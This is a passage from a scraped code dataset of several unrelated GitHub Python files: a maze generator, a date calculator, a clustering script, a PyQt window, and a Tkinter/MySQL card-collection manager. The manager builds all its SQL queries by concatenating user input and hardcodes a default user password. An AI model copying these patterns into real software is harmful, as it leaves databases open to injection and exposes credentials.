quote.select('.tags')\n print(text.text)\n print(author.text)\n for tag in tags:\n print(tag.text)\n print('================================================================')\n page += 1\n \n\n","repo_name":"An0816/PyTorchZeroToAll","sub_path":"web scraping/beautifulsoup_prac1.py","file_name":"beautifulsoup_prac1.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3752722554","text":"import pygame as ga\nimport numpy as np\nfrom math import *\nimport pygame.gfxdraw as gfx\nimport random\n\nclass Cell():\n surface = None\n color = (80,80,80)\n res = 20\n\n def __init__(self,i,j) -> None:\n self.i = i\n self.j = j\n x = self.i * self.res \n y = self.j * self.res\n self.border = [1,1,1,1]\n self.visited = False\n self.wall = [(x,y),(x+self.res,y),(x+self.res,y+self.res),(x,y+self.res)] # N E S O\n\n def Show(self):\n # if self.visited:\n # ga.draw.rect(self.surface,(255,0,255),ga.Rect(self.wall[0][0],self.wall[0][1],self.res,self.res))\n for i in range(4):\n if self.border[i]:\n ga.draw.line(self.surface,self.color,self.wall[i],self.wall[(i+1)%4],20)\n\n def getRC(self):\n return self.i,self.j\n\nclass Maze():\n width = 0\n height = 0\n\n def __init__(self,l,c,res,color=(80,80,80)):\n Cell.surface = ga.Surface((self.width,self.height))\n Cell.color = color\n self.res = res\n Cell.res = self.res\n self.cells = []\n self.l = l\n self.c = c\n\n for j in range(self.c):\n for i in range(self.l):\n self.cells.append(Cell(i,j))\n\n def Show(self):\n img = np.zeros((self.width,self.height),np.int64)\n for c in self.cells:\n c.Show()\n ga.display.flip()\n ga.pixelcopy.surface_to_array(img,Cell.surface,'P')\n return img\n\n def getId(self,v):\n i,j = v\n if (i>=0 and i<self.c and j>= 0 and j<self.l):\n return (i+self.c*j)\n else:\n return -1 \n\n def findVoisin(self,id):\n i,j = self.cells[id].getRC()\n v = [(i-1,j),(i+1,j),(i,j-1),(i,j+1)]\n liste = []\n for k in range(4):\n nId = self.getId(v[k])\n if nId>0 :\n if not(self.cells[nId].visited):\n liste.append(nId)\n if len(liste)>0:\n return random.choice(liste)\n else:\n return None\n\n def removeWall(self,a,b):\n x = b.i - a.i\n if x == 1:\n a.border[1] = 0\n b.border[3] = 0\n elif (x == -1):\n a.border[3] = 0\n b.border[1] = 0\n y = b.j - a.j\n if y ==1:\n a.border[2] = 0\n b.border[0] = 0\n elif y == -1:\n a.border[0] = 0\n b.border[2] = 0\n \n def Build(self,id):\n next = id\n stack = []\n stack.append(next)\n while next != None:\n self.cells[next].visited = True\n next = self.findVoisin(next)\n if next != None:\n stack.append(next)\n self.removeWall(self.cells[id],self.cells[next])\n id = next\n else:\n print(stack)\n if not stack==[]:\n # print(next)\n next = stack.pop()\n self.removeWall(self.cells[id],self.cells[next])\n id = next\n","repo_name":"e-coucou/Machine-Learning","sub_path":"0-Drafts/Ants/Maze.py","file_name":"Maze.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37813249692","text":"######### Date calculator ##############\r\nfrom tkinter import * # import all methods and classes from the tkinter\r\n#tkcalendar module install bhi krna hoga\r\nfrom tkcalendar import DateEntry # import DateEntry from tkcalen\r\n\r\nroot=Tk()\r\nroot.geometry(\"300x200\")\r\nroot.title(\"Date calculator\")\r\n\r\ndef difference():\r\n date_dif=cal1.get_date() - cal2.get_date() #date difference\r\n combo1.set(date_dif) # date_dif ka value combo1 
me update kr do\r\n\r\n\r\nlbl=Label(root,text=\"Date difference\",font=\"arial 15 bold\").grid(row=1,column=2)\r\n\r\n################# from #############\r\nlbl=Label(root,text=\"From\",font=\"arial 15 bold\").grid(row=2,column=1)\r\ncal1 = DateEntry(root, width=10, year=2020, month=6, day=2,font=\"arial 15 bold\", background='darkblue', foreground='white', borderwidth=2)\r\ncal1.grid(row=2,column=2)\r\n\r\n############## To ###############\r\n\r\nlbl=Label(root,text=\"To\",font=\"arial 15 bold\").grid(row=3,column=1)\r\ncal2 = DateEntry(root, width=10, year=2019, month=6, day=22,font=\"arial 15 bold\", background='darkblue', foreground='white', borderwidth=2)\r\ncal2.grid(row=3,column=2)\r\n\r\n\r\n############ Difference #############\r\n\r\nlbl3=Label(root,text=\"Differnce\",font=\"arial 15 bold\").grid(row=5,column=1)\r\nb=Button(root,text=\"click\",font=\"lucinda 15 bold\",command=difference).grid(row=4,column=2)\r\n\r\ncombo1=StringVar(root)\r\nentry1=Entry(root,textvariable=combo1,font=\"arial 12 bold\",width=18).grid(row=5,column=2)\r\n\r\nroot.resizable(0,0) # frame ko fix kr diya\r\nroot.mainloop()\r\n","repo_name":"Noushad96/date-difference","sub_path":"tkdateconvertor.py","file_name":"tkdateconvertor.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32460233176","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.cluster import KMeans, DBSCAN\nfrom sklearn.metrics import davies_bouldin_score as dbi\nfrom sklearn.manifold import MDS\nfrom matplotlib import pyplot as plt\nfrom sklearn.decomposition import PCA\n\n\ndef pre_process_task2(raw_data=pd.DataFrame()):\n train_data = raw_data.iloc[:, [0, 1, 3]]\n BSSID_col = list(train_data.index.unique())\n idx = train_data.finLabel.unique()\n design_mat = pd.DataFrame(columns=BSSID_col + ['RoomLabel'], index=idx)\n for fin in train_data.finLabel.unique():\n design_mat.loc[fin, :-1] = train_data.iloc[(train_data.loc[:, 'finLabel'] == fin).tolist(), 0]\n design_mat.loc[fin, 'RoomLabel'] = train_data.iloc[(train_data.loc[:, 'finLabel'] == fin).tolist(), 1].iloc[0]\n design_mat = design_mat.fillna(-500)\n return design_mat\n\n\ndef task2():\n raw_data1 = pd.read_csv('./data/Task2/DataSetKMeans1.csv', index_col=0)\n raw_data2 = pd.read_csv('./data/Task2/DataSetKMeans2.csv', index_col=0)\n data1, data2 = pre_process_task2(raw_data1), pre_process_task2(raw_data2)\n data = (data1, data2)\n trans = PCA(n_components=2), PCA(n_components=2)\n # trans = MDS(n_components=2), MDS(n_components=2)\n transformed = trans[0].fit_transform(data1.iloc[:, :-1]), trans[1].fit_transform(data2.iloc[:, :-1])\n dbi_record = pd.DataFrame(columns=pd.Series(list(range(2, 6)) + ['truth'], name='k'),\n index=pd.Series([1, 2], name='data_idx'))\n\n for data_idx in (0, 1):\n plt.scatter(transformed[data_idx][:, 0], transformed[data_idx][:, 1],\n c=data[data_idx].iloc[:, -1], marker='.')\n dbi_score = dbi(data[data_idx].iloc[:, :-1], data[data_idx].iloc[:, -1])\n dbi_record.loc[data_idx + 1, 'truth'] = dbi_score\n plt.title(f'data {data_idx + 1} with true label')\n # plt.savefig(fname=f'data {data_idx + 1} with true label.svg')\n plt.show()\n for k in range(2, 6):\n cls = KMeans(n_clusters=k, init='k-means++')\n predict = cls.fit_predict(data[data_idx].iloc[:, :-1])\n centroids = cls.cluster_centers_\n centroids_trans = trans[data_idx].transform(centroids)\n # centroids, clusterAssment = kMeans(data[data_idx].iloc[:, :-1].values, k)\n # centroids = 
np.array(centroids)\n dbi_score = dbi(data[data_idx].iloc[:, :-1], predict)\n dbi_record.loc[data_idx + 1, k] = dbi_score\n plt.scatter(transformed[data_idx][:, 0], transformed[data_idx][:, 1], c=predict, marker='.',\n label='data point', alpha=0.3)\n plt.scatter(centroids_trans[:, 0], centroids_trans[:, 1], marker='+',\n c=list(range(centroids_trans.shape[0])), label='centroid', edgecolors='black', s=150)\n plt.legend()\n plt.title(f'{k}-means on data {data_idx + 1}')\n # plt.savefig(fname=f'{k}-means on data {data_idx + 1}.svg')\n plt.show()\n print(dbi_record)\n pass\n\n\nif __name__ == '__main__':\n task2()\n","repo_name":"JyChang012/ML_Projects","sub_path":"Clustering/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21808363107","text":"import Tkinter\nimport MySQLdb\n\n\ndef connect(userID, password):\n global con\n global cur\n global uID\n con.close()\n cur.close()\n con= MySQLdb.connect(host= \"Infectionserver.no-ip.org\",\n port= 3307,\n user= userID,\n passwd= password,\n db = \"CSC335\")\n cur=con.cursor()\n cur.execute(\"select user_ID from users where name='\"+user+\"';\")\n uID=int(cur.fetchone()[0])\n return con\n\ndef conn(userID):#only used for initial database panel\n conn= MySQLdb.connect(host= \"Infectionserver.no-ip.org\",\n port= 3307,\n user= userID,\n db = \"CSC335\")\n return conn\n\nclass databasePanel:\n def __init__(self, frameL):\n self.search = LabelFrame(frameL,text=\"search\")\n self.search.pack(fill=X)\n self.sIn= Entry(self.search)\n self.sIn.pack(fill=X)\n self.searchButton = Button(self.search, text=\"go\", command=self.updateSearch)\n self.searchButton.pack(fill=X)\n #DATABASE LIST\n self.database = LabelFrame(frameL, text=\"Database\")\n self.database.pack(fill=X)\n self.scrollbarL = Scrollbar(self.database)\n \n\n self.mylistL = Listbox(self.database, yscrollcommand = self.scrollbarL.set, selectmode=SINGLE)\n cur.execute(\"select name, ed_index from card;\")\n self.dataList =cur.fetchall()\n for line in self.dataList:\n self.mylistL.insert(END, line)\n #CARDVIEW TEXT\n self.cardview= LabelFrame(frameL, text=\"cardview\")\n self.cardview.pack(fill=X)\n\n self.mylistL.pack( side = LEFT, fill = BOTH )\n self.scrollbarL.pack( side = LEFT, fill=Y )\n #select button\n self.cardupdatebutton=Button(self.database, text=\"select\",command=self.updateCard)\n self.scrollbarL.config( command = self.mylistL.yview )\n self.cardupdatebutton.pack()\n \n self.card = Label(self.cardview,text=\"\")\n self.card.pack(fill=Y)\n\n def updateSearch(self):\n self.mylistL.delete(0,self.mylistL.size())\n #get search results from server and store in newList\n cur.execute(\"select name, ed_index from card where name ='\"+self.sIn.get()+\"'\")\n newList=cur.fetchall()\n for x in newList:\n self.mylistL.insert(END,x)\n\n def updateCard(self):\n self.sel=self.mylistL.curselection()\n #print(self.sel)\n #print(self.mylistL.get(self.sel))\n cur.execute(\"select name, ed_index, mainType, subType, attack, defense from card where name='\"+self.mylistL.get(self.sel)[0]+\"' and ed_index='\"+self.mylistL.get(self.sel)[1]+\"';\")\n self.Cdata=cur.fetchone()\n self.card.config(text=self.Cdata)\n\n def refresh(self):\n self.mylistL.delete(0,END)\n cur.execute(\"select name, ed_index from card\")\n newList=cur.fetchall()\n for x in newList:\n self.mylistL.insert(END,x)\n \nclass collectionPanel:\n def __init__(self, frameR):\n self.colV=LabelFrame(frameR, 
text=\"collection\")\n self.colV.pack()\n self.scrollbarR = Scrollbar(self.colV)\n \n #card collection menu\n self.mylistR = Listbox(self.colV, yscrollcommand = self.scrollbarR.set )\n cur.execute(\"select card_name, ed_index, number from cards_owned where user_ID='\"+str(uID)+\"';\")\n self.dataList=cur.fetchall()\n for line in self.dataList:\n self.mylistR.insert(END, line)\n\n self.mylistR.pack( side = LEFT, fill = BOTH )\n self.scrollbarR.pack( side = LEFT, fill=Y )\n self.scrollbarR.config( command = self.mylistR.yview )\n self.buttons=Frame(self.colV)\n self.buttons.pack(side=LEFT,fill=Y)\n self.addC=Button(self.buttons, text=\"add Card\", command=lambda:self.addCard)\n self.remC=Button(self.buttons, text=\"remove Card\",command=lambda:self.removeCard())\n self.selC=Button(self.buttons, text=\"select\",command=lambda:self.updateCard)\n self.addC.pack(fill=X)\n self.remC.pack(fill=X)\n self.selC.pack(fill=X)\n \n def hide(self):\n self.colV.pack_forget()\n\n def show(self):\n self.colV.pack()\n\n def updateCard(self, databasePanel):\n self.sel=self.mylistR.curselection()\n #print(self.sel)\n #print(self.mylistL.get(self.sel))\n cur.execute(\"select name, ed_index, mainType, subType, attack, defense from card where name='\"+self.mylistR.get(self.sel)[0]+\"' and ed_index='\"+self.mylistR.get(self.sel)[1]+\"';\")\n databasePanel.Cdata=cur.fetchone()\n databasePanel.card.config(text=databasePanel.Cdata)\n\n def addCard(self, databasePanel):\n searchKey=databasePanel.mylistL.get(databasePanel.mylistL.curselection())\n cur.execute(\"select number from cards_owned where card_name='\"+searchKey[0]+\"' and user_ID=\"+str(uID)+\" and ed_index='\"+searchKey[1]+\"';\")\n count=cur.fetchone()\n if count:\n count=int(count[0])+1\n cur.execute(\"UPDATE cards_owned SET number=\"+str(count)+\" WHERE card_name='\"+searchKey[0]+\"' and user_ID=\"+str(uID)+\" and ed_index='\"+searchKey[1]+\"';\")\n else:\n cur.execute(\"INSERT INTO cards_owned(user_ID, card_name, ed_index, number) VALUES(\"+str(uID)+\",'\"+searchKey[0]+\"', '\"+searchKey[1]+\"', 1);\")\n con.commit()\n self.refresh()\n\n def removeCard(self):\n searchKey=self.mylistR.get(self.mylistR.curselection())\n cur.execute(\"select number from cards_owned where card_name='\"+searchKey[0]+\"' and user_ID=\"+str(uID)+\" and ed_index='\"+searchKey[1]+\"';\")\n count=int(cur.fetchone()[0])\n if count>1:\n count=count-1\n cur.execute(\"UPDATE cards_owned SET number=\"+str(count)+\" WHERE card_name='\"+searchKey[0]+\"' and user_ID=\"+str(uID)+\" and ed_index='\"+searchKey[1]+\"';\")\n else:\n cur.execute(\"DELETE FROM cards_owned WHERE card_name='\"+searchKey[0]+\"' and user_ID=\"+str(uID)+\" and ed_index='\"+searchKey[1]+\"';\")\n con.commit()\n self.refresh()\n \n def refresh(self):\n self.mylistR.delete(0,END)\n cur.execute(\"select card_name,ed_index,number from cards_owned where user_ID=\"+str(uID)+\";\")\n self.dataList=cur.fetchall()\n for line in self.dataList:\n self.mylistR.insert(END, line)\n \nclass deckPanel:\n def __init__(self,frameR):\n self.deckV=LabelFrame(frameR, text=\"deck\")\n self.deckV.pack(side=LEFT)\n \n #deck selection menu\n self.deckScroll = Scrollbar(self.deckV)\n self.deckScroll.pack( side = LEFT, fill=Y )\n self.deckList = Listbox(self.deckV, yscrollcommand = self.deckScroll.set )\n cur.execute(\"select deck_name from owned_decks where user_ID='\"+str(uID)+\"';\")\n self.dataList=cur.fetchall()\n for line in self.dataList:\n self.deckList.insert(END, line[0])\n\n self.deckList.pack( side = LEFT, fill = BOTH )\n 
self.deckScroll.config( command = self.deckList.yview )\n\n #deck display menu\n self.dcScroll=Scrollbar(self.deckV)\n self.dcList = Listbox(self.deckV, yscrollcommand = self.dcScroll.set)\n self.dcList.pack(side=LEFT,fill=BOTH)\n self.dcScroll.pack(side=LEFT,fill=Y)\n self.dcScroll.config(command=self.dcList.yview)\n self.buttons=Frame(self.deckV)\n self.buttons.pack(side=LEFT,fill=Y)\n self.addC=Button(self.buttons, text=\"add Card\", command=lambda:self.addCard)\n self.remC=Button(self.buttons, text=\"remove Card\",command=lambda:self.removeCard())\n self.selC=Button(self.buttons, text=\"select\",command=lambda:self.updateCard)\n self.addD=Button(self.buttons, text=\"new Deck\", command=lambda:self.addDeck())\n self.remD=Button(self.buttons, text=\"delete Deck\", command=lambda:self.removeDeck())\n self.selD=Button(self.buttons, text=\"select Deck\", command=lambda:self.selDeck())\n self.deckName=LabelFrame(self.buttons, text=\"Deck Name\")\n self.newD=Entry(self.deckName)\n self.addC.pack(fill=X)\n self.remC.pack(fill=X)\n self.selC.pack(fill=X)\n self.deckName.pack(fill=X)\n self.newD.pack(fill=X)\n self.addD.pack(fill=X)\n self.remD.pack(fill=X)\n self.selD.pack(fill=X)\n \n def hide(self):\n self.deckV.pack_forget()\n\n def show(self):\n self.deckV.pack()\n\n def updateCard(self, databasePanel):\n self.sel=self.dcList.curselection()\n #print(self.sel)\n #print(self.mylistL.get(self.sel))\n cur.execute(\"select name,ed_index, mainType, subType, attack, defense from card where name='\"+self.dcList.get(self.sel)[0]+\"' and ed_index='\"+self.dcList.get(self.sel)[1]+\"';\")\n databasePanel.Cdata=cur.fetchone()\n databasePanel.card.config(text=databasePanel.Cdata)\n\n def addCard(self, databasePanel):\n searchKey=str(databasePanel.mylistL.get(databasePanel.mylistL.curselection())[0])\n cur.execute(\"select number from deck where card_name='\"+searchKey+\"' and deck_ID=\"+str(deckID)+\";\")\n count=cur.fetchone()\n if count:\n count=int(count[0])+1\n cur.execute(\"UPDATE deck SET number=\"+str(count)+\" WHERE card_name='\"+searchKey+\"' and deck_ID=\"+str(deckID)+\";\")\n\n else:\n cur.execute(\"INSERT INTO deck(deck_ID, card_name, number, ed_index) VALUES (\"+str(deckID)+\",'\"+searchKey+\"', 1, '\"+databasePanel.mylistL.get(databasePanel.mylistL.curselection())[1]+\"');\")\n con.commit()\n self.refreshD()\n \n def removeCard(self):\n searchKey=str(self.dcList.get(self.dcList.curselection())[0])\n cur.execute(\"select number from deck where card_name='\"+searchKey+\"' and deck_ID=\"+str(deckID)+\";\")\n count=int(cur.fetchone()[0])\n if count>1:\n count=count-1\n cur.execute(\"UPDATE deck SET number=\"+str(count)+\" WHERE card_name='\"+searchKey+\"' and deck_ID=\"+str(deckID)+\";\")\n else:\n cur.execute(\"DELETE FROM deck WHERE card_name='\"+searchKey+\"' and deck_ID=\"+str(deckID)+\";\")\n con.commit()\n self.refreshD()\n \n def selDeck(self):\n global deckID\n searchKey=str(self.deckList.get(self.deckList.curselection())[0])\n self.dcList.delete(0,END)\n cur.execute(\"select deck_ID from owned_decks where deck_name='\"+searchKey+\"';\")\n deckID=int(cur.fetchone()[0])\n cur.execute(\"select card_name, ed_index, number from deck where deck_ID=\"+str(deckID)+\";\")\n self.deckData=cur.fetchall()\n for x in self.deckData:\n self.dcList.insert(END,x)\n \n def addDeck(self):\n cur.execute(\"INSERT INTO owned_decks(user_ID, deck_name) VALUES(\"+str(uID)+\",'\"+self.newD.get()+\"');\")\n con.commit()\n self.refresh()\n \n def removeDeck(self):\n cur.execute(\"DELETE FROM deck where 
deck_ID=\"+str(deckID)+\";\")\n cur.execute(\"DELETE FROM owned_decks where deck_ID=\"+str(deckID)+\";\")\n con.commit()\n self.refresh()\n self.refreshD()\n \n def refresh(self):\n global deckID\n deckID=''\n cur.execute(\"select deck_name from owned_decks where user_ID='\"+str(uID)+\"';\")\n self.dataList=cur.fetchall()\n self.deckList.delete(0,END)\n self.dcList.delete(0,END)\n for line in self.dataList:\n self.deckList.insert(END, line)\n \n def refreshD(self):\n cur.execute(\"select card_name, ed_index, number from deck where deck_ID='\"+str(deckID)+\"'\")\n self.dcList.delete(0,END)\n self.deckData=cur.fetchall()\n for x in self.deckData:\n self.dcList.insert(END,x) \n\nclass adminPanel:\n def __init__(self,frameR):\n self.admV=LabelFrame(frameR, text=\"admin\")\n self.admV.pack()\n #creates user options\n self.tools=LabelFrame(self.admV, text=\"admin tools\")\n self.tools.pack()\n \n self.users=Button(self.tools, text=\"user options\", command=lambda: self.userO())\n self.users.pack(fill=X)\n self.userV=LabelFrame(self.tools, text=\"Users\")\n self.userV.pack()\n self.userSB=Scrollbar(self.userV)\n self.userList= Listbox(self.userV,yscrollcommand = self.userSB.set )\n self.userSB.config( command = self.userList.yview )\n self.newUser= LabelFrame(self.userV, text=\"new user\")\n self.userName= Entry(self.newUser)\n self.addU=Button(self.newUser, text=\"add User\", command=lambda: self.adduser())\n self.delU=Button(self.userV, text=\"delete User\", command=lambda: self.deluser())\n self.selU=Button(self.userV, text=\"select User\", command=lambda: self.seluser())\n #displays user options\n self.userList.pack(side=LEFT, fill=BOTH)\n self.userSB.pack(side=LEFT,fill=Y)\n self.newUser.pack(fill=X)\n self.userName.pack(fill=X)\n self.addU.pack(fill=X)\n self.delU.pack(fill=X)\n self.selU.pack(fill=X)\n #removes user options\n self.userV.pack_forget()\n\n #creates card options\n self.cards=Button(self.tools, text=\"card options\", command=lambda: self.cardO())\n self.cards.pack(fill=X)\n self.cardV=LabelFrame(self.tools, text=\"Cards\")\n self.cardN=LabelFrame(self.cardV, text=\"new card\")\n self.cName=Entry(self.cardN)\n self.cName.insert(0,\"name\")\n self.cEd=Entry(self.cardN)\n self.cEd.insert(0, \"Edition\")\n \n self.cCostR=Entry(self.cardN)\n self.cCostR.insert(0,\"cost Red\")\n self.cCostBu=Entry(self.cardN)\n self.cCostBu.insert(0,\"cost Blue\")\n self.cCostW=Entry(self.cardN)\n self.cCostW.insert(0,\"cost White\")\n self.cCostBa=Entry(self.cardN)\n self.cCostBa.insert(0,\"cost Black\")\n self.cCostG=Entry(self.cardN)\n self.cCostG.insert(0,\"cost Green\")\n self.cCost=Entry(self.cardN)\n self.cCost.insert(0,\"cost colorless\")\n self.cCostx=Entry(self.cardN)\n self.cCostx.insert(0,\"cost X\")\n self.cCosts=Entry(self.cardN)\n self.cCosts.insert(0,\"cost special\")\n self.cCostsv=Entry(self.cardN)\n self.cCostsv.insert(0,\"cost special value\")\n \n self.cStr=Entry(self.cardN)\n self.cStr.insert(0,\"strength\")\n self.cHP=Entry(self.cardN)\n self.cHP.insert(0, \"life\")\n self.cAbility=Entry(self.cardN)\n self.cAbility.insert(0,\"Abilities\")\n self.cFlavor=Entry(self.cardN)\n self.cFlavor.insert(0,\"flavor\")\n self.cRare=Entry(self.cardN)\n self.cRare.insert(0,\"rarity\")\n self.cT1=Entry(self.cardN)\n self.cT1.insert(0,\"Type1\")\n self.cT2=Entry(self.cardN)\n self.cT2.insert(0,\"Type2\")\n self.cEd=Entry(self.cardN)\n self.cEd.insert(0,\"edition index\")\n self.addC=Button(self.cardN, text=\"add Card\")\n self.delC=Button(self.cardV, text=\"delete Card\")\n \n 
self.cardV.pack(fill=X)\n self.cardN.pack(fill=X)\n #displays entry boxes\n self.cName.pack(fill=X)\n self.cEd.pack(fill=X)\n \n \n self.cCostR.pack(fill=X)\n self.cCostBu.pack(fill=X)\n self.cCostW.pack(fill=X)\n self.cCostBa.pack(fill=X)\n self.cCostG.pack(fill=X)\n self.cCost.pack(fill=X)\n self.cCostx.pack(fill=X)\n self.cCosts.pack(fill=X)\n self.cCostsv.pack(fill=X)\n \n self.cT1.pack(fill=X)\n self.cT2.pack(fill=X)\n self.cAbility.pack(fill=X)\n self.cFlavor.pack(fill=X)\n self.cRare.pack(fill=X)\n self.cStr.pack(fill=X)\n self.cHP.pack(fill=X)\n #displays buttons\n self.addC.pack(fill=X)\n self.delC.pack(fill=X)\n #removes card options\n self.cardV.pack_forget()\n #removes admin panel\n def hide(self):\n self.admV.pack_forget()\n\n def show(self):\n self.admV.pack()\n\n def cardO(self):\n self.userV.pack_forget()\n self.cardV.pack()\n\n def userO(self):\n self.cardV.pack_forget()\n self.userV.pack()\n\n def newCard(self, databasePanel):\n name=self.cName.get()\n edition=self.cEd.get()\n cRed=self.cCostR.get()\n cBlue=self.cCostBu.get()\n cWhite=self.cCostW.get()\n cBlack=self.cCostBa.get()\n cGreen=self.cCostG.get()\n cLess=self.cCost.get()\n cX=self.cCostx.get()\n cs=self.cCosts.get()\n csv=self.cCostsv.get()\n mType=self.cT1.get()\n sType=self.cT2.get()\n ef=self.cAbility.get()\n rare=self.cRare.get()\n atk=self.cStr.get()\n hp=self.cHP.get()\n cur.execute(\"INSERT INTO card(name,ed_index,cost_Red,cost_Blue,cost_White,cost_Black,cost_Green,cost_colorless,var_colorless,var_special,cost_special,mainType,subType,effect,rarity,attack,defense) Values ('\"+name+\"','\"+edition+\"',\"+cRed+\",\"+cBlue+\",\"+cWhite+\",\"+cBlack+\",\"+cGreen+\",\"+cLess+\",\"+cX+\",'\"+cs+\"',\"+csv+\",'\"+mType+\"','\"+sType+\"','\"+ef+\"','\"+rare+\"','\"+atk+\"','\"+hp+\"');\")\n con.commit()\n databasePanel.refresh()\n \n def delCard(self, databasePanel):\n searchKey=databasePanel.mylistL.get(databasePanel.mylistL.curselection())\n cur.execute(\"DELETE FROM deck WHERE card_name='\"+searchKey[0]+\"' and ed_index='\"+searchKey[1]+\"';\")\n cur.execute(\"DELETE FROM cards_owned WHERE card_name='\"+searchKey[0]+\"' and ed_index='\"+searchKey[1]+\"';\")\n cur.execute(\"DELETE FROM card WHERE name='\"+searchKey[0]+\"' and ed_index='\"+searchKey[1]+\"';\")\n con.commit()\n databasePanel.refresh()\n \n def adduser(self):\n cur.execute(\"INSERT INTO users(name, pass, permission) VALUES('\"+self.userName.get()+\"', 'MightyMouse!', 'Basic_Access');\")\n con.commit()\n self.refresh()\n \n def deluser(self, frameR):\n searchKey=self.userList.get(self.userList.curselection())\n cur.execute(\"select user_ID from users where name='\"+searchKey[0]+\"';\")\n searchKey=str(cur.fetchone()[0])\n cur.execute(\"select deck_ID from owned_decks where user_ID=\"+searchKey+\";\")\n decks=cur.fetchall()\n for x in decks:\n cur.execute(\"DELETE FROM deck WHERE deck_ID=\"+str(x[0])+\";\")\n cur.execute(\"DELETE FROM owned_decks WHERE user_ID=\"+searchKey+\";\")\n cur.execute(\"DELETE FROM cards_owned WHERE user_ID=\"+searchKey+\";\")\n cur.execute(\"DELETE FROM users WHERE user_ID=\"+searchKey+\";\")\n con.commit()\n frameR.refresh()\n\n def seluser(self, rPanel):\n global uID\n uID=self.userList.get(self.userList.curselection())[1]\n rPanel.refresh()\n \n def refresh(self):\n self.userList.delete(0,END)\n cur.execute(\"select name,user_ID from users\")\n userData=cur.fetchall()\n for x in userData:\n self.userList.insert(END, x)\n \nclass rightPanel:\n def __init__(self,root):\n self.frameR = Frame(root)\n self.frameR.pack(side = 
RIGHT)\n        \n        self.buttonList = LabelFrame(self.frameR, text=\"View Mode\")\n        self.buttonList.pack(fill=X)\n        def colButton():\n            self.cp.show()\n            self.dp.hide()\n            self.ap.hide()\n        self.cButton = Button(self.buttonList, text=\"collection\", command = colButton)\n        self.cButton.pack(side=LEFT)\n        def deckButton():\n            self.cp.hide()\n            self.dp.show()\n            self.ap.hide()\n        self.dButton = Button(self.buttonList, text=\"deck\", command = deckButton)\n        self.dButton.pack(side=LEFT)\n        def admButton():\n            self.cp.hide()\n            self.dp.hide()\n            self.ap.show()\n\n        self.aButton = Button(self.buttonList, text=\"admin\", command = admButton)\n        self.aButton.pack(side=LEFT)\n        #self.dp.deckV.pack()\n        #self.cp.colV.pack()\n        #self.ap.admV.pack()\n        self.dp= deckPanel(self.frameR)\n        self.cp= collectionPanel(self.frameR)\n        self.ap= adminPanel(self.frameR)\n        self.dp.hide()\n        self.ap.hide()\n        self.frameR.pack_forget()\n\n        self.pwLogin=LabelFrame(root,text=\"login\")\n        self.pwLogin.pack()\n        \n        self.userIDin=Entry(self.pwLogin)\n        self.pwIn=Entry(self.pwLogin, show='*')\n        self.userIDin.pack()\n        self.pwIn.pack()\n\n        self.loginButton = Button(self.pwLogin, text=\"Login\", command = lambda:\n            self.login(self.userIDin.get(), self.pwIn.get()))\n        self.loginButton.pack(side=LEFT)\n        \n    def refresh(self):\n        self.dp.refresh()\n        self.cp.refresh()\n        self.ap.refresh()\n    def login(self, usrID, pw):\n        global user\n        user=usrID\n        connect(usrID,pw)\n        self.frameR.pack()\n        self.pwLogin.pack_forget()\n        self.refresh()\n        \nfrom Tkinter import *\nroot = Tk()\nuser=\"Basic\"\nuID=\"0\"\ncon=conn(user)\ncur=con.cursor()\nframeL = Frame(root)\nframeL.pack(side = LEFT, fill=BOTH)\n\ndata= databasePanel(frameL)\nframeR=rightPanel(root)\n#various function links to external parts of the program (IE updateCard functions to the database panel)\nframeR.cp.selC.config(command=lambda:frameR.cp.updateCard(data))\nframeR.cp.addC.config(command=lambda:frameR.cp.addCard(data))\nframeR.dp.selC.config(command=lambda:frameR.dp.updateCard(data))\nframeR.dp.addC.config(command=lambda:frameR.dp.addCard(data))\nframeR.ap.delC.config(command=lambda:frameR.ap.delCard(data))\nframeR.ap.addC.config(command=lambda:frameR.ap.newCard(data))\nframeR.ap.selU.config(command=lambda:frameR.ap.seluser(frameR))\nframeR.ap.delU.config(command=lambda:frameR.ap.deluser(frameR))\nmainloop()\n","repo_name":"Ceje/Card-Database-CSC335","sub_path":"ProjGUI2.py","file_name":"ProjGUI2.py","file_ext":"py","file_size_in_byte":21711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"20396495082","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 2013-4-23\n\n@author: Administrator\n@brief mainwindow\n'''\n\nfrom PyQt5 import QtWidgets, QtCore\n\nimport FileDirDiff.UI.ui_mainwindow\nimport FileDirDiff.Frame.LoggerWin\nimport FileDirDiff.Frame.LeftFnWin\n#from FileDirDiff.Core.GlobalIns import GlobalIns\nfrom FileDirDiff.Core.AppSys import AppSys\n\nclass MainWindow(QtWidgets.QMainWindow):\n    \n    instance = None\n    \n    def __init__(self, app):\n        # make sure multiple instantiation won't happen\n        assert(MainWindow.instance is None)\n        super(MainWindow, self).__init__()\n        \n        MainWindow.m_instance = self\n        self.m_app = app\n        \n        self.createUI()\n        # instantiate the global variables\n        #GlobalIns.insGlobal()\n        AppSys.instance();\n        AppSys.instance().postInit();\n\n\n    def createUI(self):\n        self.ui = FileDirDiff.UI.ui_mainwindow.Ui_MainWindow()\n        self.ui.setupUi(self)\n        \n        # dockable window at the bottom\n        self.m_LoggerWin = FileDirDiff.Frame.LoggerWin.LoggerWin()\n        self.addDockWidget(QtCore.Qt.BottomDockWidgetArea, self.m_LoggerWin)\n        \n        # dockable window on the left\n        self.m_LeftFnWin = FileDirDiff.Frame.LeftFnWin.LeftFnWin()\n        self.addDockWidget(QtCore.Qt.LeftDockWidgetArea, self.m_LeftFnWin)\n        \n        self.m_qttimer = QtCore.QTimer()\n        self.m_qttimer.timeout.connect(self.onTimer)\n        self.m_qttimer.start( 1000 )\n\n\n    def onTimer(self):\n        listdata = []\n        AppSys.instance().m_logSys.getlogger(listdata)\n        for dataitem in listdata:\n            